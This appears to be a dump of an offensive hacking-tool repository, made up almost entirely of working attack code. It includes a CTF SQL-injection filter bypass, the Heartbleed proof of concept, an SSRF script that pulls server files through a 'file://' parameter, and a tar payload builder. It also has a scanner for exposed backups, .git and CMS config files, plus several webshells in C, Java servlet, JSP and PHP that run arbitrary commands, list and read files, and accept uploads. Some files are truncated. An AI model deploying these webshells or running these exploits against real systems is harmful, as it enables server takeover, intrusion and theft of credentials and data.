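    url = 'http://202.120.7.203/index.php?id='
    # # & 0 1 2 3 4 5 6 7 8 9 @

    headers = {}

    sql = "-1 union sel\x00ect 1,(sel\x00ect+flag+fro\x00m+flag),3"
    print(get(url + sql, headers))
    #
    #
    #
    #
    # flag{W4f_bY_paSS_f0R_CI}
    #
    #

    #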

flag{W4f_bY_paSS_f0R_CI}

64 | #
65 | # 3
66 | #

View article

67 | 68 | # 69 | # 70 | -------------------------------------------------------------------------------- /tools/ssltest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) 4 | # The author disclaims copyright to this source code. 5 | 6 | import sys 7 | import struct 8 | import socket 9 | import time 10 | import select 11 | import re 12 | from optparse import OptionParser 13 | 14 | options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') 15 | options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') 16 | 17 | def h2bin(x): 18 | return x.replace(' ', '').replace('\n', '').decode('hex') 19 | 20 | hello = h2bin(''' 21 | 16 03 02 00 dc 01 00 00 d8 03 02 53 22 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf 23 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 24 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 25 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c 26 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 27 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 28 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c 29 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 30 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 31 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 32 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 33 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 34 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 35 | 00 0f 00 01 01 36 | ''') 37 | 38 | hb = h2bin(''' 39 | 18 03 02 00 03 40 | 01 40 00 41 | ''') 42 | 43 | def hexdump(s): 44 | for b in xrange(0, len(s), 16): 45 | lin = [c for c in s[b : b + 16]] 46 | hxdat = ' '.join('%02X' % ord(c) for c in lin) 47 | pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin) 48 | print ' %04x: %-48s %s' % (b, hxdat, pdat) 49 | print 50 | 51 | def recvall(s, length, timeout=5): 52 | endtime = time.time() + timeout 53 | rdata = '' 54 | remain = length 55 | while remain > 0: 56 | rtime = endtime - time.time() 57 | if rtime < 0: 58 | return None 59 | r, w, e = select.select([s], [], [], 5) 60 | if s in r: 61 | data = s.recv(remain) 62 | # EOF? 63 | if not data: 64 | return None 65 | rdata += data 66 | remain -= len(data) 67 | return rdata 68 | 69 | 70 | def recvmsg(s): 71 | hdr = recvall(s, 5) 72 | if hdr is None: 73 | print 'Unexpected EOF receiving record header - server closed connection' 74 | return None, None, None 75 | typ, ver, ln = struct.unpack('>BHH', hdr) 76 | pay = recvall(s, ln, 10) 77 | if pay is None: 78 | print 'Unexpected EOF receiving record payload - server closed connection' 79 | return None, None, None 80 | print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) 81 | return typ, ver, pay 82 | 83 | def hit_hb(s): 84 | s.send(hb) 85 | while True: 86 | typ, ver, pay = recvmsg(s) 87 | if typ is None: 88 | print 'No heartbeat response received, server likely not vulnerable' 89 | return False 90 | 91 | if typ == 24: 92 | print 'Received heartbeat response:' 93 | hexdump(pay) 94 | if len(pay) > 3: 95 | print 'WARNING: server returned more data than it should - server is vulnerable!' 96 | else: 97 | print 'Server processed malformed heartbeat, but did not return any extra data.' 98 | return True 99 | 100 | if typ == 21: 101 | print 'Received alert:' 102 | hexdump(pay) 103 | print 'Server returned error, likely not vulnerable' 104 | return False 105 | 106 | def main(): 107 | opts, args = options.parse_args() 108 | if len(args) < 1: 109 | options.print_help() 110 | return 111 | 112 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 113 | print 'Connecting...' 114 | sys.stdout.flush() 115 | s.connect((args[0], opts.port)) 116 | print 'Sending Client Hello...' 
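117 | sys.stdout.flush() 118 | s.send(hello) 119 | print 'Waiting for Server Hello...' 120 | sys.stdout.flush() 121 | while True: 122 | typ, ver, pay = recvmsg(s) 123 | if typ == None: 124 | print 'Server closed connection without sending Server Hello.' 125 | return 126 | # Look for server hello done message. 127 | if typ == 22 and ord(pay[0]) == 0x0E: 128 | break 129 | 130 | print 'Sending heartbeat request...' 131 | sys.stdout.flush() 132 | s.send(hb) 133 | hit_hb(s) 134 | 135 | if __name__ == '__main__': 136 | main() 137 | -------------------------------------------------------------------------------- /tools/ssrf.py: --------------------------------------------------------------------------------
#!/bin/env python
#-*- encoding: utf-8 -*-
r"""Pull local files through an SSRF/LFI-prone ``url`` parameter (the "sha4"
challenge at pwning.xxx).

``get_one_file(path, 'url')`` POSTs ``{'url': 'file://' + path}`` to the
upload endpoint and returns the body; ``down_file_by_dict`` does that for
every path in a wordlist under ../dict/. Target, scheme prefix and parameter
name are the module-level ``url``, ``p`` and ``argv`` set in ``__main__``.

Fix against the original: the base64 extractor matched a single character
(``(\S)"``) instead of the whole payload, so it never matched real data.
"""

import requests as req
import base64
import re
import sys
import os

# Where down_one_file() stores fetched files (one sub-directory per target).
SAVE_ROOT = "/Users/virink/tmp/"


def decode_base64(html):
    """Return the base64 payload of a ``data:image/jpeg;base64, ...`` URI in ``html``, else ``html``.

    Despite the name this returns the still-encoded text; base64.b64decode()
    it when the raw bytes are needed.
    """
    if 'data:image' not in html:
        return html
    op = re.search(r'data:image/jpeg;base64, (\S+)"$', html)
    return op.group(1) if op else html


def get_file(path, ispost=False):
    """GET ``url + path``, or POST the dict ``ispost`` to ``url``; body on HTTP 200, else False."""
    global url
    if ispost:
        res = req.post(url, data=ispost)
    else:
        res = req.get(url + path)
    html = res.content
    if res.status_code == 200:  # and 'data:image' in html:
        return html
    else:
        return False


def get_one_file(path, data=False):
    """Fetch ``path``: as POST field ``data`` = ``p + path`` when ``data`` is given, else via GET.

    Returns the body, or '' on failure.
    """
    global p
    _data = {}
    if data:
        _data = {
            data: p + path
        }
    html = get_file(path, _data)
    return html if html else ''


def save_to_file(file_name, file_data, dic_name):
    """Append ``dic_name`` and ``file_data`` (when non-empty) to ``file_name``."""
    print(file_name)
    with open(file_name, 'a') as f:
        if file_data:
            f.write(dic_name)
            f.write("\n")
            f.write(file_data)
            f.write("\n")
            f.write("\n")


def get_dic(dic):
    """Read ../dict/<dic> and return its lines without newlines."""
    with open("../dict/" + dic) as f:
        return [i.replace('\n', '') for i in f.readlines()]


def down_file_by_dict(dic_name, tmp, p=False):
    """Fetch every path in wordlist ``dic_name`` (POST field ``p``) and append results to ./../tmp/<tmp>."""
    for dic in get_dic(dic_name):
        print(dic)
        save_to_file("./../tmp/" + tmp, get_one_file(dic, p), dic)


def down_one_file(file_name, argv, save_dir):
    """Fetch ``file_name`` via POST field ``argv`` and store it under SAVE_ROOT/<save_dir>/<basename>."""
    save_file = file_name.split("/")[-1]
    target_dir = SAVE_ROOT + save_dir
    if not os.path.exists(target_dir):
        os.mkdir(target_dir)
    with open(target_dir + "/" + save_file, 'w') as f:
        res = get_one_file(file_name, argv)
        print(res)
        f.write(res)

if __name__ == '__main__':
    url = "http://sha4.chal.pwning.xxx/upload"
    p = 'file://'
    argv = 'url'
    # print get_one_file('/etc/apache2/apache2.conf', "url")
    # print get_one_file('/var/www/sha4/server.py', "url")
    # /var/tmp/comments/%s.file
    print(get_one_file("/var/tmp/comments/8a9d7c33b323f0fbb3a82c4b9c157380.file", "url"))
    # ###############
    # down_one_file('/var/www/sha4/admin.py', 'url', 'pctf_sha4')
    # down_file_by_dict('ssrf&lfi/proc.dic', 'pctf_sha4_proc.log', argv)
-------------------------------------------------------------------------------- /tools/tarfile.py: --------------------------------------------------------------------------------
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""Build a one-member ustar archive in memory without the stdlib tarfile module.

Useful for crafting upload payloads where member name and content must be
controlled byte by byte. ``tarfile(name, data)`` returns the archive bytes
(a str); ``run(fn, cn, cd)`` writes ``fn + ".tar"``.

NOTE: this module is itself named ``tarfile``, so importing it shadows the
standard library module of the same name.

Fixes against the original: the size field was written in *decimal*
(``'0000000000' + str(len)``), so any content of 8, 9 or >= 10 bytes got a
size the reader could not trust, and lengths of exactly 10 or 100 fell
through to ``return 0``; the checksum and magic were not in ustar form;
content longer than 512 bytes was not padded to a block boundary; and the
archive ended with one zero block instead of two.
"""

import os

__info__ = {
    "desc": "Output a tar file by script",
    "version": "1.0",
    "usage": "tarfile filename content_name content_data"
}

BLOCK = 512


def tarfile(content_name='test.php', content_data='test'):
    """Return a str holding a tar archive with one regular-file member.

    Returns None (after printing an error) when ``content_name`` exceeds the
    100-byte name field, and 0 when ``content_data`` is empty, as before.
    """
    if len(content_name) > 100:
        print('content_name error')
        return
    size = len(content_data)
    if size < 1:
        return 0
    t_name = content_name + '\x00' * (100 - len(content_name))
    t_mode = '0000664\x00'
    t_uid = '0001750\x00'
    t_gid = '0001750\x00'
    # size and mtime: 11 octal digits + NUL (the original wrote the size in decimal)
    t_size = '%011o\x00' % size
    t_mtime = '01274124644\x00'
    t_typeflag = '0'  # regular file
    t_linkname = '\x00' * 100
    t_magic = 'ustar\x00'  # POSIX ustar magic, followed by version "00"
    t_version = '00'
    t_uname = 'root' + '\x00' * (32 - 4)
    t_gname = 'root' + '\x00' * (32 - 4)
    t_devmajor = '\x00' * 8
    t_devminor = '\x00' * 8
    t_prefix = '\x00' * 155
    t_padding = '\x00' * 12
    _a = t_name + t_mode + t_uid + t_gid + t_size + t_mtime
    _b = t_typeflag + t_linkname + t_magic + t_version + t_uname + \
        t_gname + t_devmajor + t_devminor + t_prefix + t_padding
    # Header checksum: byte sum with the 8-byte chksum field counted as spaces
    # (8 * 0x20 = 256), stored as 6 octal digits, NUL, space.
    _sum = sum(ord(j) for j in _a + _b) + 256
    t_chksum = '%06o\x00 ' % _sum
    # Data rounded up to whole 512-byte blocks, then two zero blocks (end of archive).
    t_block = content_data + '\x00' * ((BLOCK - size % BLOCK) % BLOCK)
    return _a + t_chksum + _b + t_block + '\x00' * (2 * BLOCK)


def saveToFile(filename, tarData):
    """Write ``tarData`` to ``filename`` in binary mode."""
    with open(filename, 'wb') as f:
        f.write(tarData)


def run(fn, cn, cd):
    """Write ``fn``.tar containing member ``cn`` with content ``cd`` (defaults when empty)."""
    filename = fn + ".tar"
    content_name = cn or "virink.txt"
    content_data = cd or "virink"
    print('Runing...')
    saveToFile(filename, tarfile(content_name, content_data))
    if os.path.exists(filename):
        print(os.path.join("./", filename))
    else:
        print(False)

if __name__ == '__main__':
    run('9981', '2333', 'ddddd')
-------------------------------------------------------------------------------- /tools/urllibreq.py: --------------------------------------------------------------------------------
#!/bin/env python
#-*- encoding: utf-8 -*-
"""Tiny urllib2 form-POST helper: ``post(url, values)`` returns (status, body)."""

import time
import urllib
import urllib2
import json

TIMEOUT = 10  # seconds; urlopen() without a timeout can block forever


def post(url, values):
    """URL-encode ``values`` and POST them to ``url`` with browser-like headers.

    Returns ``(http_status, body)``; urllib2.HTTPError / URLError propagate.
    """
    data = urllib.urlencode(values)
    req = urllib2.Request(url, data)
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0',
        'cache-control': 'no-cache',
        'accept': '*/*',
        'connection': 'keep-alive',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    for name, value in headers.items():
        req.add_header(name, value)
    response = urllib2.urlopen(req, timeout=TIMEOUT)
    try:
        return response.getcode(), response.read()
    finally:
        response.close()


if __name__ == '__main__':
    url = 'http://'
    values = {'tel': 'xxx', 'type': "xxx"}
    code, body = post(url, values)
-------------------------------------------------------------------------------- /tools/vi_vim_scan_and_download.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # __Author__: Byblue 3 | # __Change__: Virink 4 | 5 | import time 6 | import urllib 7 | import urllib2 8 | 9 | 10 | interval = 1 11 | 12 | websites = { 13 | "http://web.l-ctf.com:55533": "php" 14 | } 15 | script = { 16 | "general": { 17 | "/robots.txt", "/install.txt", "/password.txt", "/readme.txt", "/sql.txt", "/Password.txt", "/ReadMe.txt", 18 | "/www.rar", "/wwwroot.rar", "/webroot.rar", "/backup.rar", 19 | "/www.zip", "/wwwroot.zip", "/webroot.zip", "/backup.zip", 20 | "/DS_Store", "/.DS_Store",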
"/.svn/entries", "/.htaccess", "/.git/config" 21 | }, 22 | "php": { 23 | "index.php", 24 | "config.php" 25 | }, 26 | "jsp": { 27 | "index.jsp", 28 | "config.jsp" 29 | }, 30 | "asp": { 31 | "index.asp", 32 | "config.asp" 33 | }, 34 | "aspx": { 35 | "index.aspx", 36 | "config.aspx" 37 | }, 38 | "discuz": { 39 | "config/config_global.php", # discuz 40 | "config/config_ucenter.php", # discuz 41 | "uc_server/data/config.inc.php" # discuz 42 | }, 43 | "dede": { 44 | "data/common.inc.php", # dede old version 45 | "include/config_base.php" # dede new version 46 | }, 47 | "qibo": { 48 | "data/mysql_config.php" # qibo 49 | }, 50 | "thinkphp": { 51 | "Common/Conf/config.php" # thinkphp 52 | } 53 | } 54 | 55 | 56 | def getScriptConfig(sc): 57 | if script.has_key(sc): 58 | return script[sc] 59 | else: 60 | return script['php'] 61 | 62 | 63 | def downLoad(fileUrl, path="./downloads/"): 64 | try: 65 | u = urllib2.urlopen(fileUrl) 66 | #data = u.read() 67 | splitPath = fileUrl.split('/') 68 | fName = splitPath.pop() 69 | print "Downloading: %s " % (fName) 70 | start = fileUrl.find('://')+3 71 | end = fileUrl.find('/', start) 72 | urllib.urlretrieve(fileUrl, path+fileUrl[start:end]+"_"+fName) 73 | except Exception, e: 74 | print "[+]%s----%s" % (fileUrl, e) 75 | 76 | 77 | def usage(): 78 | print "no usage." 
79 | 80 | 81 | def main(): 82 | generalBackup = getScriptConfig('general') 83 | 84 | while (True): 85 | for backup in generalBackup: 86 | for website in websites.keys(): 87 | script = websites[website] 88 | downLoad(website+backup) 89 | time.sleep(interval) 90 | 91 | for backup in vimBackup: 92 | for website in websites.keys(): 93 | script = websites[website] 94 | if isinstance(getScriptConfig(script), set): 95 | vimBackup = getScriptConfig(script) 96 | path = website+backup 97 | idx = path.rfind('/') 98 | downLoad(path[0:idx]+"/" + path[idx+1:]+".bak") 99 | time.sleep(interval) 100 | 101 | for backup in vimBackup: 102 | for website in websites.keys(): 103 | script = websites[website] 104 | if isinstance(getScriptConfig(script), set): 105 | vimBackup = getScriptConfig(script) 106 | path = website+backup 107 | idx = path.rfind('/') 108 | downLoad(path[0:idx]+"/" + path[idx+1:]+"~") 109 | time.sleep(interval) 110 | 111 | for backup in vimBackup: 112 | for website in websites.keys(): 113 | script = websites[website] 114 | if isinstance(getScriptConfig(script), set): 115 | vimBackup = getScriptConfig(script) 116 | path = website+backup 117 | idx = path.rfind('/') 118 | downLoad(path[0:idx]+"/."+path[idx+1:]+".swp") 119 | time.sleep(interval) 120 | break 121 | if __name__ == "__main__": 122 | start = time.time() 123 | main() 124 | end = time.time() 125 | -------------------------------------------------------------------------------- /webshell/asp/ice.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/asp/ice.asp -------------------------------------------------------------------------------- /webshell/asp/wumi.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/asp/wumi.asp 
-------------------------------------------------------------------------------- /webshell/c/cmd.c: -------------------------------------------------------------------------------- 1 | // 2 | // cmdcgi.exe 0.1 darkraver (12/05/2005) 3 | // 4 | 5 | #include 6 | 7 | 8 | char *uri_decode(char *uri) { 9 | int i=0; 10 | int ptr=0; 11 | char *command; 12 | char hexa[3]; 13 | char code; 14 | 15 | command=(char *)malloc(strlen(uri)); 16 | 17 | for(i=0;i\n"); 53 | 54 | cmd=(char *)getenv("QUERY_STRING"); 55 | 56 | if(!cmd || strlen(cmd)==0) { 57 | printf("

"); 58 | printf(""); 59 | printf(""); 60 | printf("


"); 61 | } else { 62 | //printf("QUERY_STRING: %s\n", cmd); 63 | cmd+=4; 64 | cmd=uri_decode(cmd); 65 | printf("

COMMAND: %s


\n", cmd);
66 |     fflush(stdout);
67 |     execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
68 |     }
69 | 
70 | }
71 | 
72 | 
73 | 
74 | 
75 | 


--------------------------------------------------------------------------------
/webshell/jsp/CmdServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/jsp/CmdServlet.class


--------------------------------------------------------------------------------
/webshell/jsp/CmdServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * CmdServlet.java	20/01/2004
 3 |  *
 4 |  * @author The Dark Raver
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 | 
12 | 
13 | public class CmdServlet extends HttpServlet {
14 | 
15 |     public void doGet(HttpServletRequest req, HttpServletResponse res)	throws ServletException, IOException {
16 | 		res.setContentType("text/html");
17 | 
18 | 		PrintWriter out = res.getWriter();
19 | 		out.print("");
20 | 		out.print("

"); 21 | out.print(""); 22 | out.print(""); 23 | out.print("
"); 24 | 25 | if(req.getParameter("cmd") != null) { 26 | out.print("\n

Command: " + req.getParameter("cmd") + "\n


\n");
27 | 	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | 	        DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | 			int c='\0';
30 |         	while ((c=procIn.read()) != -1) {
31 | 				out.print((char)c);
32 | 				}
33 | 	        }
34 | 
35 | 		out.print("\n
"); 36 | out.print(""); 37 | } 38 | 39 | public String getServletInfo() { 40 | return "CmdServlet 0.1"; 41 | } 42 | 43 | } 44 | -------------------------------------------------------------------------------- /webshell/jsp/ListServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/jsp/ListServlet.class -------------------------------------------------------------------------------- /webshell/jsp/ListServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * ListServlet.java 3 | * 4 | * @author Sierra 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.ServletException; 10 | import javax.servlet.http.*; 11 | 12 | public class ListServlet extends HttpServlet 13 | { 14 | 15 | 16 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 17 | PrintWriter printwriter = res.getWriter(); 18 | String path = req.getParameter("file"); 19 | 20 | printwriter.write("\n\nDirectory Listing\n\n\n"); 21 | printwriter.write("\n"); 22 | if(req.getParameter("file")==null) path = "c:\\"; 23 | printwriter.write("

Path: " + path + "


\n");
24 | 
25 | 		File file = new File(path);
26 | 
27 | 		if(file.isDirectory())
28 | 		{
29 | 			String s = new String("Unknown");
30 | 			String s2 = new String("Black");
31 | 			File afile[] = file.listFiles();
32 | 			for(int i = 0; i < afile.length; i++)
33 | 			{
34 | 				String s1 = new String(afile[i].toString());
35 | 				printwriter.write("(");
36 | 				String s3;
37 | 				if(afile[i].isDirectory())
38 | 				{
39 | 					printwriter.write("d");
40 | 					s1 = s1 + "/";
41 | 					s3 = new String("Blue");
42 | 				} else
43 | 				if(afile[i].isFile())
44 | 				{
45 | 					printwriter.write("-");
46 | 					s3 = new String("Green");
47 | 				} else
48 | 				{
49 | 					printwriter.write("?");
50 | 					s3 = new String("Red");
51 | 				}
52 | 				if(afile[i].canRead())
53 | 					printwriter.write("r");
54 | 				else
55 | 					printwriter.write("-");
56 | 				if(afile[i].canWrite())
57 | 					printwriter.write("w");
58 | 				else
59 | 					printwriter.write("-");
60 | 				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
\n"); 61 | } 62 | 63 | printwriter.write("
"); 64 | } else 65 | if(file.canRead()) 66 | { 67 | FileInputStream fileinputstream = new FileInputStream(file); 68 | int j = 0; 69 | while(j >= 0) 70 | { 71 | j = fileinputstream.read(); 72 | printwriter.write(j); 73 | } 74 | fileinputstream.close(); 75 | } else 76 | { 77 | printwriter.write("Can't Read file
"); 78 | } 79 | 80 | } 81 | 82 | 83 | public String getServletInfo() { 84 | return "Directory Listing"; 85 | } 86 | } -------------------------------------------------------------------------------- /webshell/jsp/UpServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/jsp/UpServlet.class -------------------------------------------------------------------------------- /webshell/jsp/UpServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * UpServlet.java 29/04/2005 3 | * 4 | * @author The Dark Raver 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.*; 10 | import javax.servlet.http.*; 11 | 12 | 13 | public class UpServlet extends HttpServlet { 14 | 15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 16 | res.setContentType("text/html"); 17 | PrintWriter out = res.getWriter(); 18 | out.print(""); 19 | out.print("
"); 20 | out.print("UPLOAD "); 21 | out.print(""); 22 | out.print("
"); 23 | out.print(""); 24 | } 25 | 26 | 27 | public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 28 | String tag = new String(); 29 | int c = '\0'; 30 | int contador = 0; 31 | ServletInputStream in = req.getInputStream(); 32 | DataInputStream post = new DataInputStream(in); 33 | 34 | PrintWriter out = res.getWriter(); 35 | res.setContentType("text/html"); 36 | out.print("
");
37 | 
38 | 		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
39 | 			tag=tag.concat("" + (char)c);
40 | 			contador++;
41 | 			}
42 | 
43 | 		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
44 | 
45 | 		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
46 | 		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
47 | 
48 | 		// (!) Uploaded File Name
49 | 
50 | 		File newfile = new File("c:\\install.log");
51 | 
52 | 		/////////////////////////
53 | 
54 | 		FileOutputStream fileout = new FileOutputStream(newfile);
55 | 
56 | 		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
57 | 			c=post.read();
58 | 			fileout.write((char)c);
59 | 			}
60 | 
61 | 		fileout.close();
62 | 		out.print("<== OK");
63 | 
64 |     }
65 | 
66 | 
67 |     public String getServletInfo() {
68 | 		return "UpServlet 0.1";
69 |     }
70 | 
71 | }


--------------------------------------------------------------------------------
/webshell/jsp/cmd.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page import="java.util.*,java.io.*"%>
 2 | <%
 3 | //
 4 | // JSP_KIT
 5 | //
 6 | // cmd.jsp = Command Execution (unix)
 7 | //
 8 | // by: Unknown
 9 | // modified: 27/06/2003
10 | //
11 | %>
12 | 
13 | 
14 | 15 | 16 |
17 |
18 | <%
19 | if (request.getParameter("cmd") != null) {
20 |         out.println("Command: " + request.getParameter("cmd") + "
"); 21 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); 28 | disr = dis.readLine(); 29 | } 30 | } 31 | %> 32 |
33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /webshell/jsp/up.jsp: -------------------------------------------------------------------------------- 1 | 2 | <%@ page import="java.io.*,java.util.*,javax.servlet.*" %> 3 | <% 4 | // 5 | // JSP_KIT 6 | // 7 | // up.jsp = File Upload (unix) 8 | // 9 | // by: Unknown 10 | // modified: 27/06/2003 11 | // 12 | %> 13 | 14 |
15 | 16 | 17 |
18 | 19 | <%! 20 | public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{ 21 | String boundary = null; 22 | Enumeration enum = request.getHeaderNames(); 23 | while(enum.hasMoreElements()){ 24 | String header = (String)enum.nextElement(); 25 | String hvalue = request.getHeader(header); 26 | prop.setProperty((header).toLowerCase(),hvalue); 27 | if("content-type".equalsIgnoreCase(header) ){ 28 | int idx = hvalue.lastIndexOf("boundary="); 29 | if(idx != -1 ){ 30 | boundary= hvalue.substring(idx+9 , hvalue.length()); 31 | } 32 | } 33 | } 34 | return boundary; 35 | 36 | } 37 | public String getFileName(String secondline){ 38 | int len = secondline.length(); 39 | int idx = secondline.lastIndexOf("filename="); 40 | if(idx == -1 ) return null; 41 | String filename = secondline.substring(idx+10 , len-1); 42 | filename = filename.replace('\\','/'); 43 | idx = filename.lastIndexOf("/"); 44 | idx = idx + 1; 45 | filename = filename.substring( idx ); 46 | return filename; 47 | } 48 | %> 49 | <% 50 | String DPATH = "/tmp/"; 51 | int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks 52 | int MAXSIZE = 10; // 10 Mega Byte 53 | String boundary = getBoundary(request,prop); 54 | if(boundary == null ){ 55 | boundary = prop.getProperty("boundary"); 56 | }else{ 57 | boundary = "--"+boundary; 58 | } 59 | if(boundary == null ){ 60 | return; 61 | } 62 | Long contentsize = new Long(prop.getProperty("content-length","0")); 63 | int c; 64 | StringWriter st = new StringWriter(); 65 | if(contentsize.longValue() < 1L ){ 66 | return; 67 | } 68 | long l = contentsize.longValue() - ROUGHSIZE; 69 | int KB = 1024; 70 | int MB = 1024 * KB; 71 | int csize = (int)(l / MB); 72 | if(csize > MAXSIZE ){ 73 | return; 74 | } 75 | ServletInputStream fin = request.getInputStream(); 76 | int cn; 77 | int count=0; 78 | while((c=fin.read()) != -1 ){ 79 | if( c == '\r') break; 80 | st.write(c); 81 | count++; 82 | } 83 | c=fin.read(); 84 | String 
tboundary = st.getBuffer().toString(); 85 | tboundary=tboundary.trim(); 86 | if(! tboundary.equalsIgnoreCase( boundary) ){ 87 | return; 88 | } 89 | st.close(); 90 | st = null; 91 | st = new StringWriter(); 92 | while((c=fin.read()) != -1 ){ 93 | if( c == '\r' ) break; 94 | st.write(c); 95 | } 96 | c=fin.read(); 97 | String secondline = st.getBuffer().toString(); 98 | String filename = getFileName(secondline); 99 | st.close(); 100 | st = null; 101 | st = new StringWriter(); 102 | while((c=fin.read()) != -1 ){ 103 | if( c == '\r' ) break; 104 | st.write( c ); 105 | } 106 | c=fin.read(); 107 | 108 | fin.read(); 109 | fin.read(); 110 | File newfile = null; 111 | FileOutputStream fout =null; 112 | try{ 113 | if(filename == null) throw new FileNotFoundException("File Name not found"); 114 | newfile = new File(DPATH+filename); 115 | fout = new FileOutputStream( newfile ); 116 | }catch(FileNotFoundException fnexp){ 117 | fin.close(); 118 | return; 119 | } 120 | 121 | byte b[] = null; 122 | while(l > 1024L){ 123 | b = new byte[1024]; 124 | fin.read(b,0,1024); 125 | fout.write(b); 126 | b=null; 127 | l -= 1024L; 128 | } 129 | if(l > 0){ 130 | b = new byte[(int)l]; 131 | fin.read(b,0,(int)l); 132 | fout.write(b); 133 | } 134 | 135 | 136 | ByteArrayOutputStream baos = new ByteArrayOutputStream(); 137 | while((c = fin.read()) != -1){ 138 | baos.write(c); 139 | } 140 | String laststring = baos.toString(); 141 | int idx = laststring.indexOf(boundary); 142 | b = baos.toByteArray(); 143 | if(idx > 2){ 144 | fout.write(b,0,idx-2); 145 | }else{ 146 | fout.close(); 147 | newfile.delete(); 148 | return; 149 | } 150 | fout.flush(); 151 | fout.close(); 152 | fin.close(); 153 | 154 | out.println("FileName: " + newfile.getName()); 155 | out.println("FileSize: " + newfile.length()); 156 | 157 | %> 158 | 159 | 160 | 161 | 162 | 163 | -------------------------------------------------------------------------------- /webshell/php/cmd.php: 
-------------------------------------------------------------------------------- 1 | 11 | 12 |
13 | 14 | 15 |
16 |
17 | 
22 | 
23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /webshell/php/list.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | " . $filename . "
"; 23 | } 24 | closedir($handle); 25 | } else { 26 | echo "FILE: " . $fichero . "

";
27 |   $fp = fopen($fichero, "r");
28 |   $buffer = fread($fp, filesize($fichero));
29 |   echo $buffer;
30 |   fclose($fp);
31 |   }
32 | 
33 | ?>


--------------------------------------------------------------------------------
/webshell/php/supershell.php:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/webshell/php/up.php:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | 
13 | 
14 | 
15 | 16 |

Local File: 17 |

Remote File: 18 | 19 |




